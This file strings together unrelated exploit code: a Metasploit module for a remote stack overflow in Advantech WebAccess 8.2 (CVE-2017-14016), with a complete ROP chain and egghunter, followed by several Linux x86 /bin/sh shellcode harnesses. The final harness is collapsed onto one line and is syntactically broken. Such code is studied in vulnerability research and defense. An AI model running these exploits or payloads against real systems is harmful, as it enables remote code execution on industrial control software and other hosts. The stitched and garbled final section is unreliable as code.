
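  ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Advantech WebAccess 8.2 webvrpcs.exe, opcode 80061 (0x138bd) stack overflow
# (CVE-2017-14016 / ZDI-17-938).
#
# Flow: bind to the webvrpcs DCERPC interface on RPORT, obtain a context handle
# via opcode 4, then send opcode 1 with a 0x1000-byte string whose copy smashes
# the stack. The return address is overwritten with a "ret slide" into a stack
# pivot, a VirtualAlloc ROP chain (DEP bypass) and an egghunter that locates
# the real payload in memory.
#
# All gadget addresses are fixed module offsets in BwKrlAPI.dll / BwPAlarm.dll
# as loaded by the 8.2-2017.03.31 build named in Targets; any other build
# needs fresh offsets. No credentials are used by the module.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Egghunter

  # Size of the string the vulnerable handler copies. Both length fields in
  # the request carry this value and the overflow buffer is padded to it.
  OVERFLOW_LEN = 0x1000

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Advantech WebAccess Webvrpcs Service Opcode 80061 Stack Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack buffer overflow in Advantech WebAccess 8.2.
        By sending a specially crafted DCERPC request, an attacker could overflow
        the buffer and execute arbitrary code.
      },
      'Author'         => [ 'mr_me <mr_me[at]offensive-security[dot]com>' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'ZDI', '17-938' ],
          [ 'CVE', '2017-14016' ],
          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-306-02' ]
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'    => 2048,
          'BadChars' => "\x00",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows 7 x86 - Advantech WebAccess 8.2-2017.03.31',
            {
              'Ret'   => 0x07036cdc, # pop ebx; add esp, 994; retn 0x14
              'Slide' => 0x07048f5b, # retn
              'Jmp'   => 0x0706067e  # pop ecx; pop ecx; ret 0x04
            }
          ],
        ],
      'DisclosureDate' => 'Nov 02 2017',
      'DefaultTarget'  => 0))

    register_options([ Opt::RPORT(4592) ])
  end

  # DEP bypass for the target build. Loads VirtualAlloc from the BwKrlAPI.dll
  # IAT into ESI, stages the call arguments in EBX/EDX/ECX (dwSize = 1,
  # flAllocationType = 0x1000, flProtect = 0x40 per the gadget comments) and
  # a "push esp; ret" return address in EBP, then PUSHAD + RETN invokes
  # VirtualAlloc on the current stack and returns into it.
  #
  # Gadget order and the junk DWORDs consumed by the RETN 0x08 / ADD ESP
  # gadgets are load-bearing; do not reorder.
  #
  # @return [String] packed little-endian ROP chain
  def create_rop_chain
    rop_gadgets = [
      0x020214c6, # POP EAX # RETN [BwKrlAPI.dll]
      0x0203a134, # ptr to &VirtualAlloc() [IAT BwKrlAPI.dll]
      0x02032fb4, # MOV EAX,DWORD PTR DS:[EAX] # RETN [BwKrlAPI.dll]
      0x070738ee, # XCHG EAX,ESI # RETN [BwPAlarm.dll]
      0x0201a646, # POP EBP # RETN [BwKrlAPI.dll]
      0x07024822, # & push esp # ret [BwPAlarm.dll]
      0x070442dd, # POP EAX # RETN [BwPAlarm.dll]
      0xffffffff, # Value to negate, will become 0x00000001
      0x070467d2, # NEG EAX # RETN [BwPAlarm.dll]
      0x0704de61, # PUSH EAX # ADD ESP,0C # POP EBX # RETN [BwPAlarm.dll]
      rand_text_alpha(4).unpack('V'),
      rand_text_alpha(4).unpack('V'),
      rand_text_alpha(4).unpack('V'),
      0x02030af7, # POP EAX # RETN [BwKrlAPI.dll]
      0xfbdbcbd5, # put delta into eax (-> put 0x00001000 into edx)
      0x02029003, # ADD EAX,424442B # RETN [BwKrlAPI.dll]
      0x0201234a, # XCHG EAX,EDX # RETN [BwKrlAPI.dll]
      0x07078df5, # POP EAX # RETN [BwPAlarm.dll]
      0xffffffc0, # Value to negate, will become 0x00000040
      0x070467d2, # NEG EAX # RETN [BwPAlarm.dll]
      0x07011e60, # PUSH EAX # ADD AL,5B # POP ECX # RETN 0x08 [BwPAlarm.dll]
      0x0706fe66, # POP EDI # RETN [BwPAlarm.dll]
      rand_text_alpha(4).unpack('V'),
      rand_text_alpha(4).unpack('V'),
      0x0703d825, # RETN (ROP NOP) [BwPAlarm.dll]
      0x0202ca65, # POP EAX # RETN [BwKrlAPI.dll]
      0x90909090, # nop
      0x07048f5a, # PUSHAD # RETN [BwPAlarm.dll]
    ].flatten.pack("V*")

    return rop_gadgets
  end

  # Binds to the webvrpcs interface, fetches a context handle and fires the
  # overflowing opcode-1 request. The service is not expected to answer once
  # the stack is smashed, so NoResponse is treated as success and the payload
  # handler is started afterwards.
  def exploit
    connect

    rpc_handle = dcerpc_handle('5d2b62aa-ee0a-4a95-91ae-b064fdb471fc', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
    print_status("Binding to #{rpc_handle} ...")
    dcerpc_bind(rpc_handle)
    print_status("Bound to #{rpc_handle} ...")

    # Opcode 4 returns a context handle in the last 4 bytes of its reply; the
    # vulnerable opcode 1 takes it as its first argument. Bail out cleanly
    # instead of raising NoMethodError on a missing or truncated reply.
    resp = dcerpc.call(0x4, [0x02000000].pack('V'))
    unless resp && resp.length >= 4
      fail_with(Failure::UnexpectedReply, 'Did not receive a context handle from opcode 4')
    end
    ctx_handle = resp[-4, 4].unpack('V').first
    print_good("Got a handle: 0x%08x" % ctx_handle)

    egghunter, egg = generate_egghunter(payload.encoded, payload_badchars, { :eggtag => "0day" })

    # "ret chain": six RETN slides land on Jmp (pop ecx; pop ecx; ret 4), which
    # leads into Ret (pop ebx; add esp, 994; retn 0x14) - the pivot that drops
    # execution into the ROP chain below. Six more slides absorb the pivot's
    # stack adjustment.
    slide = [target['Slide']].pack('V')
    overflow = slide * 6
    overflow << [target['Jmp']].pack('V')
    overflow << [target['Ret']].pack('V')
    overflow << (slide * 6)
    overflow << create_rop_chain
    overflow << egghunter
    overflow << egg

    # The request advertises exactly OVERFLOW_LEN bytes; a larger buffer would
    # silently truncate the padding (rand_text_alpha of a negative length).
    if overflow.length > OVERFLOW_LEN
      fail_with(Failure::BadConfig, "Overflow buffer is #{overflow.length} bytes, limit is #{OVERFLOW_LEN}")
    end
    overflow << rand_text_alpha(OVERFLOW_LEN - overflow.length)

    # Stub built by hand rather than with the NDR helpers (original author's choice).
    sploit = [ctx_handle].pack('V')
    sploit << [0x000138bd].pack('V')   # opcode 80061, the vulnerable handler
    sploit << [OVERFLOW_LEN].pack('V') # size to copy
    sploit << [OVERFLOW_LEN].pack('V') # size of string
    sploit << overflow

    print_status("Trying target #{target.name}...")
    begin
      dcerpc_call(0x1, sploit)
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse
      # Expected: the crashed service never replies.
    ensure
      disconnect
    end

    handler
  end
end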

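    /*
 * lnx_binsh2.c - v1 - 45 Byte /bin/sh sysenter Opcode Array Payload
 *
 * Copyright(c) 2005 c0ntex <[email protected]>
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
 */

/*
 * Tested: fedora core 3
 *
 * execve("/bin/sh") using sysenter from __kernel_vsyscall as opposed to int $0x80
 *
 * (gdb) disas __kernel_vsyscall
 * Dump of assembler code for function __kernel_vsyscall:
 * 0xffffe400 <__kernel_vsyscall+0>:   push   %ecx
 * 0xffffe401 <__kernel_vsyscall+1>:   push   %edx
 * 0xffffe402 <__kernel_vsyscall+2>:   push   %ebp
 * 0xffffe403 <__kernel_vsyscall+3>:   mov    %esp,%ebp
 * 0xffffe405 <__kernel_vsyscall+5>:   sysenter
 * 0xffffe407 <__kernel_vsyscall+7>:   nop
 * 0xffffe408 <__kernel_vsyscall+8>:   nop
 * 0xffffe409 <__kernel_vsyscall+9>:   nop
 * 0xffffe40a <__kernel_vsyscall+10>:  nop
 * 0xffffe40b <__kernel_vsyscall+11>:  nop
 * 0xffffe40c <__kernel_vsyscall+12>:  nop
 * 0xffffe40d <__kernel_vsyscall+13>:  nop
 * 0xffffe40e <__kernel_vsyscall+14>:  jmp    0xffffe403 <__kernel_vsyscall+3>
 * 0xffffe410 <__kernel_vsyscall+16>:  pop    %ebp
 * 0xffffe411 <__kernel_vsyscall+17>:  pop    %edx
 * 0xffffe412 <__kernel_vsyscall+18>:  pop    %ecx
 * 0xffffe413 <__kernel_vsyscall+19>:  ret
 * 0xffffe414 <__kernel_vsyscall+20>:  add    %al,(%eax)
 * 0xffffe416 <__kernel_vsyscall+22>:  add    %al,(%eax)
 * 0xffffe418 <__kernel_vsyscall+24>:  add    %al,(%eax)
 * 0xffffe41a <__kernel_vsyscall+26>:  add    %al,(%eax)
 * 0xffffe41c <__kernel_vsyscall+28>:  add    %al,(%eax)
 * 0xffffe41e <__kernel_vsyscall+30>:  add    %al,(%eax)
 * End of assembler dump.
 * (gdb) q
 *
 * so we replace the int $0x80 instruction with
 *
 *   push %ecx
 *   push %edx
 *   push %ebp
 *   mov  %esp,%ebp
 *   sysenter
 *
 * which does make the shellcode slightly larger :/
 *
 *   804807a: 51      push %ecx
 *   804807b: 52      push %edx
 *   804807c: 55      push %ebp
 *   804807d: 89 e5   mov  %esp,%ebp
 *   804807f: 0f 34   sysenter
 */

/*
 * Harness notes (review):
 *  - The payload is 32-bit x86 code; on an x86-64 host build with `gcc -m32`.
 *  - The payload's bare `sysenter` does not return to the payload: the author's
 *    premise (see the dump above) is that the kernel resumes at the fixed
 *    __kernel_vsyscall epilogue (pop %ebp; pop %edx; pop %ecx; ret), which is
 *    why %ecx/%edx/%ebp are pushed and %ebp = %esp is set first. That was
 *    observed on the 2005-era kernel listed under "Tested"; confirm it on any
 *    newer kernel before relying on this payload.
 *  - .data is mapped non-executable by current toolchains/kernels, so the
 *    harness mprotect()s the page holding the array before jumping into it.
 */

/* Calling: execve(/bin/sh), exit(0) */

#include <stdio.h>
#include <stdint.h>
#include <unistd.h>
#include <sys/mman.h>

/*
 * 45 bytes:
 *   31 c0 31 db        xor %eax,%eax ; xor %ebx,%ebx
 *   50                 push %eax                  (string terminator)
 *   68 2f 2f 73 68     push "//sh"
 *   68 2f 62 69 6e     push "/bin"
 *   89 e3              mov %esp,%ebx              (filename)
 *   50 53 89 e1        push %eax ; push %ebx ; mov %esp,%ecx   (argv)
 *   31 d2              xor %edx,%edx              (envp = NULL)
 *   b0 0b              mov $0xb,%al               (__NR_execve)
 *   51 52 55 89 e5 0f 34   push %ecx/%edx/%ebp ; mov %esp,%ebp ; sysenter
 *   31 c0 31 db fe c0  xor %eax,%eax ; xor %ebx,%ebx ; inc %al   (__NR_exit, 0)
 *   51 52 55 89 e5 0f 34   push %ecx/%edx/%ebp ; mov %esp,%ebp ; sysenter
 */
unsigned char oPc0d3z[] =
    "\x31\xc0\x31\xdb\x50\x68\x2f\x2f"
    "\x73\x68\x68\x2f\x62\x69\x6e\x89"
    "\xe3\x50\x53\x89\xe1\x31\xd2\xb0"
    "\x0b\x51\x52\x55\x89\xe5\x0f\x34"
    "\x31\xc0\x31\xdb\xfe\xc0\x51\x52"
    "\x55\x89\xe5\x0f\x34";

/*
 * Current %esp, read through an explicit output operand. The original left
 * the value in %eax and fell off the end of a non-void function, which is
 * undefined behaviour and breaks under optimisation.
 */
static unsigned long grab_esp(void)
{
    unsigned int sp;
    __asm__ __volatile__("movl %%esp, %0" : "=r"(sp));
    return sp;
}

/*
 * Make the page(s) covering [addr, addr + len) readable, writable and
 * executable so a .data array can be jumped into. Returns mprotect()'s
 * result, or -1 if the page size cannot be determined.
 */
static int make_executable(void *addr, size_t len)
{
    long page = sysconf(_SC_PAGESIZE);
    uintptr_t start, end;

    if (page <= 0)
        return -1;
    start = (uintptr_t)addr & ~((uintptr_t)page - 1);
    end = ((uintptr_t)addr + len + (uintptr_t)page - 1) & ~((uintptr_t)page - 1);
    return mprotect((void *)start, end - start, PROT_READ | PROT_WRITE | PROT_EXEC);
}

int main(void)
{
    void (*payload)(void);
    size_t len = sizeof(oPc0d3z) - 1; /* drop the string literal's NUL */

    fprintf(stderr, "\n[-] Stack Pointer found -> [0x%lx]\n", grab_esp());
    fprintf(stderr, "\t[-] Size of payload egg -> [%zu]\n", len);

    if (make_executable(oPc0d3z, len) != 0) {
        perror("[!] mprotect");
        _exit(1);
    }

    /* %p instead of %x: the original passed a pointer to a %x conversion. */
    fprintf(stderr, "\t[-] Payload Begin -> [%p]\n", (void *)oPc0d3z);
    fprintf(stderr, "\t[-] Payload End -> [%p]\n\n", (void *)(oPc0d3z + len));

    /*
     * execve() replaces the process on success and the payload's second
     * sysenter exits with 0 on failure, so this call should never return.
     * The original looped on it forever; report and leave instead.
     */
    payload = (void (*)(void))(void *)oPc0d3z;
    payload();

    fprintf(stderr, "[!] payload returned unexpectedly\n");
    _exit(1);
}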

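    /*
 * lnx_binsh3.c - v1 - 27 Byte /bin/sh sysenter Opcode Array Payload
 *
 * Copyright(c) 2005 c0ntex <[email protected]>
 * Copyright(c) 2005 amnesia <[email protected]>
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
 */

/*
 * Tested: fedora core 3 - c0ntex
 *         debian SID    - amnesia
 *
 * execve("/bin/sh") using sysenter from __kernel_vsyscall as opposed to int $0x80
 *
 * (gdb) disas __kernel_vsyscall
 * Dump of assembler code for function __kernel_vsyscall:
 * 0xffffe400 <__kernel_vsyscall+0>:   push   %ecx
 * 0xffffe401 <__kernel_vsyscall+1>:   push   %edx
 * 0xffffe402 <__kernel_vsyscall+2>:   push   %ebp
 * 0xffffe403 <__kernel_vsyscall+3>:   mov    %esp,%ebp
 * 0xffffe405 <__kernel_vsyscall+5>:   sysenter
 * 0xffffe407 <__kernel_vsyscall+7>:   nop
 * 0xffffe408 <__kernel_vsyscall+8>:   nop
 * 0xffffe409 <__kernel_vsyscall+9>:   nop
 * 0xffffe40a <__kernel_vsyscall+10>:  nop
 * 0xffffe40b <__kernel_vsyscall+11>:  nop
 * 0xffffe40c <__kernel_vsyscall+12>:  nop
 * 0xffffe40d <__kernel_vsyscall+13>:  nop
 * 0xffffe40e <__kernel_vsyscall+14>:  jmp    0xffffe403 <__kernel_vsyscall+3>
 * 0xffffe410 <__kernel_vsyscall+16>:  pop    %ebp
 * 0xffffe411 <__kernel_vsyscall+17>:  pop    %edx
 * 0xffffe412 <__kernel_vsyscall+18>:  pop    %ecx
 * 0xffffe413 <__kernel_vsyscall+19>:  ret
 * 0xffffe414 <__kernel_vsyscall+20>:  add    %al,(%eax)
 * 0xffffe416 <__kernel_vsyscall+22>:  add    %al,(%eax)
 * 0xffffe418 <__kernel_vsyscall+24>:  add    %al,(%eax)
 * 0xffffe41a <__kernel_vsyscall+26>:  add    %al,(%eax)
 * 0xffffe41c <__kernel_vsyscall+28>:  add    %al,(%eax)
 * 0xffffe41e <__kernel_vsyscall+30>:  add    %al,(%eax)
 * End of assembler dump.
 * (gdb) q
 *
 * so we replace the int $0x80 instruction with
 *
 *   push %ecx
 *   push %edx
 *   push %ebp
 *   mov  %esp,%ebp
 *   sysenter
 *
 * which does make the shellcode slightly larger :/
 *
 *   804807a: 51      push %ecx
 *   804807b: 52      push %edx
 *   804807c: 55      push %ebp
 *   804807d: 89 e5   mov  %esp,%ebp
 *   804807f: 0f 34   sysenter
 *
 * $ ./lnx_binsh3
 *
 * [-] Stack Pointer found -> [0xbffff648]
 *     [-] Size of payload egg -> [27]
 *     [-] Payload Begin -> [0x804968c]
 *     [-] Payload End -> [0x80496b9]
 *
 * sh-2.05b$
 */

/*
 * Harness notes (review):
 *  - The payload is 32-bit x86 code; on an x86-64 host build with `gcc -m32`.
 *  - Unlike the 45-byte version this one issues `sysenter` without the
 *    push %ecx/%edx/%ebp; mov %esp,%ebp prologue and has no exit() fallback,
 *    so it only behaves if execve() succeeds. If execve() fails, where the
 *    kernel's sysenter return path lands with %ebp unset is not something
 *    this file establishes; treat a return from the payload as failure.
 *  - .data is mapped non-executable by current toolchains/kernels, so the
 *    harness mprotect()s the page holding the array before jumping into it.
 */

/* Calling: execve(/bin/sh), exit(0) */

#include <stdio.h>
#include <stdint.h>
#include <unistd.h>
#include <sys/mman.h>

/*
 * 27 bytes (reduced from 45 - amnesia):
 *   31 c0 31 db        xor %eax,%eax ; xor %ebx,%ebx
 *   50                 push %eax                  (string terminator)
 *   68 2f 2f 73 68     push "//sh"
 *   68 2f 62 69 6e     push "/bin"
 *   89 e3              mov %esp,%ebx              (filename)
 *   50 53 89 e1        push %eax ; push %ebx ; mov %esp,%ecx   (argv)
 *   31 d2              xor %edx,%edx              (envp = NULL)
 *   b0 0b              mov $0xb,%al               (__NR_execve)
 *   0f 34              sysenter
 */
unsigned char oPc0d3z[] =
    "\x31\xc0\x31\xdb\x50\x68\x2f\x2f"
    "\x73\x68\x68\x2f\x62\x69\x6e\x89"
    "\xe3\x50\x53\x89\xe1\x31\xd2\xb0"
    "\x0b\x0f\x34";

/*
 * Current %esp, read through an explicit output operand. The original left
 * the value in %eax and fell off the end of a non-void function, which is
 * undefined behaviour and breaks under optimisation.
 */
static unsigned long grab_esp(void)
{
    unsigned int sp;
    __asm__ __volatile__("movl %%esp, %0" : "=r"(sp));
    return sp;
}

/*
 * Make the page(s) covering [addr, addr + len) readable, writable and
 * executable so a .data array can be jumped into. Returns mprotect()'s
 * result, or -1 if the page size cannot be determined.
 */
static int make_executable(void *addr, size_t len)
{
    long page = sysconf(_SC_PAGESIZE);
    uintptr_t start, end;

    if (page <= 0)
        return -1;
    start = (uintptr_t)addr & ~((uintptr_t)page - 1);
    end = ((uintptr_t)addr + len + (uintptr_t)page - 1) & ~((uintptr_t)page - 1);
    return mprotect((void *)start, end - start, PROT_READ | PROT_WRITE | PROT_EXEC);
}

int main(void)
{
    void (*payload)(void);
    size_t len = sizeof(oPc0d3z) - 1; /* drop the string literal's NUL */

    fprintf(stderr, "\n[-] Stack Pointer found -> [0x%lx]\n", grab_esp());
    fprintf(stderr, "\t[-] Size of payload egg -> [%zu]\n", len);

    if (make_executable(oPc0d3z, len) != 0) {
        perror("[!] mprotect");
        _exit(1);
    }

    /* %p instead of %x: the original passed a pointer to a %x conversion. */
    fprintf(stderr, "\t[-] Payload Begin -> [%p]\n", (void *)oPc0d3z);
    fprintf(stderr, "\t[-] Payload End -> [%p]\n\n", (void *)(oPc0d3z + len));

    /*
     * execve() replaces the process on success, so this call should never
     * return. The original looped on it forever; report and leave instead.
     */
    payload = (void (*)(void))(void *)oPc0d3z;
    payload();

    fprintf(stderr, "[!] payload returned unexpectedly\n");
    _exit(1);
}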

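    /*
 * lnx_binsh4.c - v1 - 23 Byte /bin/sh sysenter Opcode Array Payload
 *
 * Copyright(c) 2005 c0ntex <[email protected]>
 * Copyright(c) 2005 BaCkSpAcE <[email protected]>
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
 */

/*
 * Tested: fedora core 3 - c0ntex
 *         fedora core 4 - BaCkSpAcE
 *         debian SID    - amnesia
 *
 * execve("/bin/sh") using sysenter from __kernel_vsyscall as opposed to int $0x80
 *
 * (gdb) disas __kernel_vsyscall
 * Dump of assembler code for function __kernel_vsyscall:
 * 0xffffe400 <__kernel_vsyscall+0>:   push   %ecx
 * 0xffffe401 <__kernel_vsyscall+1>:   push   %edx
 * 0xffffe402 <__kernel_vsyscall+2>:   push   %ebp
 * 0xffffe403 <__kernel_vsyscall+3>:   mov    %esp,%ebp
 * 0xffffe405 <__kernel_vsyscall+5>:   sysenter
 * 0xffffe407 <__kernel_vsyscall+7>:   nop
 * 0xffffe408 <__kernel_vsyscall+8>:   nop
 * 0xffffe409 <__kernel_vsyscall+9>:   nop
 * 0xffffe40a <__kernel_vsyscall+10>:  nop
 * 0xffffe40b <__kernel_vsyscall+11>:  nop
 * 0xffffe40c <__kernel_vsyscall+12>:  nop
 * 0xffffe40d <__kernel_vsyscall+13>:  nop
 * 0xffffe40e <__kernel_vsyscall+14>:  jmp    0xffffe403 <__kernel_vsyscall+3>
 * 0xffffe410 <__kernel_vsyscall+16>:  pop    %ebp
 * 0xffffe411 <__kernel_vsyscall+17>:  pop    %edx
 * 0xffffe412 <__kernel_vsyscall+18>:  pop    %ecx
 * 0xffffe413 <__kernel_vsyscall+19>:  ret
 * 0xffffe414 <__kernel_vsyscall+20>:  add    %al,(%eax)
 * 0xffffe416 <__kernel_vsyscall+22>:  add    %al,(%eax)
 * 0xffffe418 <__kernel_vsyscall+24>:  add    %al,(%eax)
 * 0xffffe41a <__kernel_vsyscall+26>:  add    %al,(%eax)
 * 0xffffe41c <__kernel_vsyscall+28>:  add    %al,(%eax)
 * 0xffffe41e <__kernel_vsyscall+30>:  add    %al,(%eax)
 * End of assembler dump.
 * (gdb) q
 *
 * so we replace the int $0x80 instruction with
 *
 *   push %ecx
 *   push %edx
 *   push %ebp
 *   mov  %esp,%ebp
 *   sysenter
 *
 * which does make the shellcode slightly larger :/
 *
 *   804807a: 51      push %ecx
 *   804807b: 52      push %edx
 *   804807c: 55      push %ebp
 *   804807d: 89 e5   mov  %esp,%ebp
 *   804807f: 0f 34   sysenter
 *
 * $ ./lnx_binsh4
 *
 * [-] Stack Pointer found -> [0xbfe0f0d8]
 *     [-] Size of payload egg -> [23]
 *     [-] Payload Begin -> [0x80496c0]
 *     [-] Payload End -> [0x80496d7]
 *
 * sh-3.00b$
 */

/*
 * Harness notes (review):
 *  - The payload is 32-bit x86 code; on an x86-64 host build with `gcc -m32`.
 *  - This variant sets up every register it uses itself (%eax via push/pop,
 *    %edx via cdq, %ebx/%ecx from %esp) and contains no NUL bytes, but like
 *    the 27-byte version it issues `sysenter` without the vsyscall prologue
 *    and has no exit() fallback, so it only behaves if execve() succeeds.
 *    Treat a return from the payload as failure.
 *  - .data is mapped non-executable by current toolchains/kernels, so the
 *    harness mprotect()s the page holding the array before jumping into it.
 */

/* Calling: execve(/bin/sh), exit(0) */

#include <stdio.h>
#include <stdint.h>
#include <unistd.h>
#include <sys/mman.h>

/*
 * 23 bytes (reduced from 45 - BaCkSpAcE):
 *   6a 0b 58           push $0xb ; pop %eax       (__NR_execve)
 *   99                 cdq                        (%edx = 0, envp)
 *   52                 push %edx                  (string terminator)
 *   68 2f 2f 73 68     push "//sh"
 *   68 2f 62 69 6e     push "/bin"
 *   54 5b              push %esp ; pop %ebx       (filename)
 *   52 53              push %edx ; push %ebx      (argv = {filename, NULL})
 *   54 59              push %esp ; pop %ecx
 *   0f 34              sysenter
 */
unsigned char oPc0d3z[] =
    "\x6a\x0b\x58\x99\x52\x68\x2f\x2f"
    "\x73\x68\x68\x2f\x62\x69\x6e\x54"
    "\x5b\x52\x53\x54\x59\x0f\x34";

/*
 * Current %esp, read through an explicit output operand. The original left
 * the value in %eax and fell off the end of a non-void function, which is
 * undefined behaviour and breaks under optimisation.
 */
static unsigned long grab_esp(void)
{
    unsigned int sp;
    __asm__ __volatile__("movl %%esp, %0" : "=r"(sp));
    return sp;
}

/*
 * Make the page(s) covering [addr, addr + len) readable, writable and
 * executable so a .data array can be jumped into. Returns mprotect()'s
 * result, or -1 if the page size cannot be determined.
 */
static int make_executable(void *addr, size_t len)
{
    long page = sysconf(_SC_PAGESIZE);
    uintptr_t start, end;

    if (page <= 0)
        return -1;
    start = (uintptr_t)addr & ~((uintptr_t)page - 1);
    end = ((uintptr_t)addr + len + (uintptr_t)page - 1) & ~((uintptr_t)page - 1);
    return mprotect((void *)start, end - start, PROT_READ | PROT_WRITE | PROT_EXEC);
}

int main(void)
{
    void (*payload)(void);
    size_t len = sizeof(oPc0d3z) - 1; /* drop the string literal's NUL */

    fprintf(stderr, "\n[-] Stack Pointer found -> [0x%lx]\n", grab_esp());
    fprintf(stderr, "\t[-] Size of payload egg -> [%zu]\n", len);

    if (make_executable(oPc0d3z, len) != 0) {
        perror("[!] mprotect");
        _exit(1);
    }

    /* %p instead of %x: the original passed a pointer to a %x conversion. */
    fprintf(stderr, "\t[-] Payload Begin -> [%p]\n", (void *)oPc0d3z);
    fprintf(stderr, "\t[-] Payload End -> [%p]\n\n", (void *)(oPc0d3z + len));

    /*
     * execve() replaces the process on success, so this call should never
     * return. The original looped on it forever; report and leave instead.
     */
    payload = (void (*)(void))(void *)oPc0d3z;
    payload();

    fprintf(stderr, "[!] payload returned unexpectedly\n");
    _exit(1);
}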

    /* lnx_binsh4.c - v1 - 21 Byte /bin/sh Opcode Array Payload Copyright(c) 2004 c0ntex <[email protected]> This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA */ /* Calling: execve(/bin/sh) */ #include <stdio.h> typedef char wikkid; wikkid oPc0d3z[] = "\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" unsigned long grab_esp() { __asm__(" xorl %eax,%eax movl %eax,%ebx movl %esp,%eax "); } int main(void) { unsigned long delta; void (*pointer)(); delta = grab_esp(); fprintf(stderr, "\n[-] Stack Pointer found -> [0x%x]\n", delta); fprintf(stderr, "\t[-] Size of payload egg -> [%d]\n", sizeof(oPc0d3z)); pointer=(void*)&oPc0d3z; while(pointer) { fprintf(stderr, "\t[-] Payload Begin -> [0x%x]\n", pointer); fprintf(stderr, "\t[-] Payload End -> [0x%x]\n\n", pointer+21); pointer(); } _exit(0x01); }